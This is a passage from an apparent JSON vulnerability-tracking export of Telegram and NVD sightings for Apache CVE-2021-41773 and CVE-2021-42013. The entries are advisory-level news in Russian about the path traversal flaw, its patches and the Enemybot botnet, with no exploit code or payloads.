\u0447\u0430\u0441\u0442\u043d\u044b\u0445 \u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0441\u0432\u043e\u0435\u0439 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438, \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0441\u0442\u0438 \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u0438.\n \n\u041f\u0435\u0440\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-41773 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 cPanel 29 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430\u043c \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c URL-\u0430\u0434\u0440\u0435\u0441\u0430 \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u0433\u043e \u043a\u043e\u0440\u043d\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0443\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0430\u0442\u0430\u043a\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438. \u0427\u0442\u043e\u0431\u044b \u0430\u0442\u0430\u043a\u0430 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0430, \u0436\u0435\u0440\u0442\u0432\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c Apache HTTP Server 2.4.49, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0442\u044c \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c 'require all denied' (\u044d\u0442\u043e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e).\n \n\u041e\u0448\u0438\u0431\u043a\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e Apache HTTP Server 2.4.49, \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Apache Server \u0438\u043b\u0438 \u0432\u0435\u0440\u0441\u0438\u0438 \u0441 \u0434\u0440\u0443\u0433\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0430 \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 CGI.\n \nApache \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 HTTP/2 (CVE-2021-41524), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0430\u0442\u0430\u043a\u0443 \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (DoS) \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u0411\u0430\u0433\u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0435\u043d\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f Apache Server \u0432\u0435\u0440\u0441\u0438\u0438 2.4.49, \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u0430. \u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 3 \u043d\u0435\u0434\u0435\u043b\u0438 \u043d\u0430\u0437\u0430\u0434, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043a\u043e\u043d\u0446\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044e 2.4.50.\n \n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0435 Shodan, \u0432 \u0441\u0435\u0442\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 100 \u0442\u044b\u0441. \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 Apache HTTP Server 2.4.49, \u043c\u043d\u043e\u0433\u0438\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0432\u0435\u0440\u0441\u0438\u044f 2.4.49 \u0431\u044b\u043b\u0430 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u0430 \u0432\u0441\u0435\u0433\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u0435\u0434\u0435\u043b\u044c \u043d\u0430\u0437\u0430\u0434, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043c\u043d\u043e\u0433\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043d\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0438\u0441\u044c. \n \n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c Apache \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u043d\u0435\u0441\u0442\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0447\u0442\u043e\u0431\u044b \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u0438 \u0441\u043d\u0438\u0437\u0438\u0442\u044c \u043b\u044e\u0431\u043e\u0439 \u0440\u0438\u0441\u043a, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.", "creation_timestamp": "2021-10-06T11:23:27.000000Z"}, {"uuid": "6daaa264-08f0-49c9-aa18-392fcb961c91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/csWvsPDyZRrNGN8kH4CPpi2jt9j8irEUB-QTIHhBuQu6Ug", "content": "", "creation_timestamp": "2021-10-06T16:00:51.000000Z"}, {"uuid": "b4cc31ba-fa53-44e7-8eff-94546351d573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/AdQLeHYWU0TXep0r9E19SOb4BNkj4m2Xf7ps4yaJzOlHAg", "content": "", "creation_timestamp": "2021-10-06T15:52:31.000000Z"}, {"uuid": "e3ad68a2-a695-4acb-a04f-fd91c916ba2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/true_secator/2194", "content": "\u200b\u200b\u0412\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a \u043c\u044b \u043f\u0438\u0441\u0430\u043b\u0438, \u0447\u0442\u043e \u0432\u044b\u0448\u043b\u0430 \u0432\u0435\u0440\u0441\u0438\u044f 2.4.50 Apache HTTP, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0439\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 0-day CVE-2021-41773. \n\n\u0412\u0441\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0438\u0441\u044c, \u0432\u0441\u0435 \u0441\u0447\u0430\u0441\u0442\u043b\u0438\u0432\u044b. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b...\n\n\u041d\u043e Apache Software Foundation \u0440\u0435\u0448\u0438\u043b\u0438 \u043a\u043e\u0441\u043f\u043b\u0435\u0438\u0442\u044c Microsoft \u0438 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0430\u0442\u0447, \u0430 \u043f\u043e\u0442\u043e\u043c \u0434\u043e\u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043a \u043d\u0435\u043c\u0443 DLC. \u0413\u043e\u0432\u043e\u0440\u044f\u0442, \u0442\u0430\u043a \u0441\u0435\u0439\u0447\u0430\u0441 \u043c\u043e\u0434\u043d\u043e.\n\n\u0414\u0440\u0443\u0433\u0438\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u043c\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e 2.4.50 \u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u043d\u0435 \u0434\u043e \u043a\u043e\u043d\u0446\u0430 (\u043d\u043e\u0432\u0430\u044f \u0434\u044b\u0440\u043a\u0430 \u0431\u044b\u043b\u0430 \u043f\u043e\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0430 CVE-2021-42013) \u0438 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0431\u044b\u043b\u0430 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f 2.4.51. \n\n\u041a\u043e\u0440\u043e\u0447\u0435, \u043e\u043f\u044f\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0439\u0442\u0435\u0441\u044c.", "creation_timestamp": "2021-10-08T10:03:32.000000Z"}, {"uuid": "d0e1447c-e1e3-4874-b2e0-88f37719cbfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/xMalaXK4nB6zHUpdDoUE_36RHTbPpAtBEcnxELHMeArfEQ", "content": "", "creation_timestamp": "2021-10-13T04:56:51.000000Z"}, {"uuid": "bca871b5-2113-476d-9b26-98c41fc2a244", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/K2iBOhd0lri9r93BsiwZlPWlyW5BLlXbLG0kJ2GwVWmafQ", "content": "", "creation_timestamp": "2021-10-30T13:02:36.000000Z"}, {"uuid": "f147f973-4079-430e-81fb-36aaa6d4515f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/tzMeIaQe8jWhFS66sUpACTghiA8uGE1m3M73dCLH57TxXA", "content": "", "creation_timestamp": "2021-11-08T14:49:01.000000Z"}, {"uuid": "f152e064-4e80-4cbe-91aa-0ed7321e24aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/NeKaspersky/1313", "content": "Apache \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u0438 \u043c\u0435\u0439\u043d\u0441\u0442\u0440\u0438\u043c\u0443 \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f 0-day \u0432 \u0441\u0432\u043e\u0451\u043c \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435(\u043a\u0430\u043a Microsoft).\u0410\u043f\u0434\u0435\u0439\u0442 \u0434\u043b\u044f CVE-2021-41773 \u0443\u0436\u0435 \u0432\u044b\u0448\u0435\u043b \u0432\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a, \u043d\u043e \u0435\u0433\u043e \u043d\u0435 \u0445\u0432\u0430\u0442\u0438\u043b\u043e. \n\n\u041f\u0430\u0442\u0447 2.4.50 \u0437\u0430\u043a\u0440\u044b\u0432\u0430\u043b \u0434\u044b\u0440\u0443 \u043d\u0435 \u0434\u043e \u043a\u043e\u043d\u0446\u0430, \u043e \u0447\u0435\u043c \u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438:\n\n\u00ab\u041e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0435\u0440\u0432\u044b\u0439 \u043f\u0430\u0442\u0447 \u043d\u0435 \u0440\u0435\u0448\u0430\u043b \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2021-41773, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u043c\u043e\u0433\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043e\u0431\u0445\u043e\u0434 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0438 \u0437\u0430\u043c\u0430\u043f\u0438\u0442\u044c URL \u043d\u0430 \u0444\u0430\u0439\u043b\u044b, \u043d\u0430\u0445\u043e\u0434\u044f\u0449\u0438\u0435\u0441\u044f \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u043b \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 CGI-\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u043b\u0430\u0441\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430\u00bb.\n\n\u00ab\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u0435\u0440\u0441\u0438\u0438 Apache 2.4.49 \u0438 2.4.50. \u0411\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0435 \u0440\u0435\u043b\u0438\u0437\u044b \u043d\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u044d\u0442\u0443 \u0434\u044b\u0440\u0443\u00bb.", "creation_timestamp": "2022-05-12T13:12:52.000000Z"}, {"uuid": "5cf19a7d-14ac-46ca-8a73-27ac22501ff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/cibsecurity/30186", "content": "\u203c CVE-2021-42013 \u203c\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-07T20:34:08.000000Z"}, {"uuid": "381db71d-38e4-4fe1-8721-569f53a512ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/NeKaspersky/2117", "content": "\u041d\u043e\u0432\u044b\u0439 \u0431\u043e\u0442\u043d\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0432\u0435\u0440\u0431\u0443\u0435\u0442 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b \u0438 IoT-\u0434\u0435\u0432\u0430\u0439\u0441\u044b \u0432 \u0441\u0432\u043e\u0438 \u0440\u044f\u0434\u044b\n\n\u0410\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0438 \u0443\u0433\u0440\u043e\u0437 \u0438\u0437 Fortinet \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u00ab\u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435\u00bb, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0435\u0435 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u0442\u0447\u0435\u0442 \u043e \u0435\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0435.  \u041f\u043e \u0438\u0445 \u0441\u043b\u043e\u0432\u0430\u043c, Enemybot \u043f\u043e\u0441\u0442\u0440\u043e\u0435\u043d \u043d\u0430 \u0431\u0430\u0437\u0435 Mirai \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u0437\u0430 \u0441\u0447\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 \u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0412\u0435\u0449\u0435\u0439.  \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u0441\u0442\u043e\u044f\u0449\u0438\u0435 \u0437\u0430 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u043c, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e-\u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0435 \u0438 DDoS-\u0430\u0442\u0430\u043a\u0430\u0445 \u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0431\u043e\u0442\u043e\u0432 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u0435\u0439.\n\nEnemybot \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044e \u0441\u0442\u0440\u043e\u043a, \u0432 \u0442\u043e \u0432\u0440\u0435\u043c\u044f \u043a\u0430\u043a \u0435\u0433\u043e C2 \u043f\u0440\u044f\u0447\u0435\u0442\u0441\u044f \u0432 \u0441\u0435\u0442\u0438 Tor, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0431\u0435\u0437\u0433\u043b\u0430\u0432\u0438\u0442\u044c \u0431\u043e\u0442\u043d\u0435\u0442 \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u0442\u0438\u0447\u043d\u043e.  \u0421\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0433\u043e \u0434\u0435\u0432\u0430\u0439\u0441\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441 C2 \u0438 \u043e\u0436\u0438\u0434\u0430\u0435\u0442 \u043f\u043e\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434. \u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043d\u0438\u0445 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 DDoS-\u0430\u0442\u0430\u043a\u0430\u043c\u0438, \u043d\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 \u044d\u0442\u0438\u043c \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f. \u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043a\u043e\u0441\u044f\u0447\u043d\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043a\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u0438 Enemybot, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440: \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 Enemybot \u0441\u043e\u0431\u0440\u0430\u043d \u043f\u043e\u0434 x86, x64, i686, darwin, bsd, arm \u0438 arm64, ppc, m68k \u0438 spc.\n\n\u0427\u0442\u043e \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, Fortinet \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438, \u0447\u0442\u043e 3 CVE \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432\u0441\u0435\u043c\u0438 \u0441\u0431\u043e\u0440\u043a\u0430\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430:\n\u2022 CVE-2020-17456: RCE \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 Seowon Intech SLC-130 \u0438 SLR-120S (CVSS 9.8).\n\u2022 CVE-2018-10823: RCE \u0432 D-Link DWR (CVSS 8.8).\n\u2022 CVE-2022-27226: \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 cronjob (\u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u043a\u0441\u043e\u0432\u044b\u0445 \u0434\u0435\u043c\u043e\u043d\u043e\u0432 \u0430\u0432\u0442\u043e\u0441\u0442\u0430\u0440\u0442\u0430) \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 iRZ (CVSS 8.8).\n\n\u0414\u0440\u0443\u0433\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043b\u0438\u0448\u044c 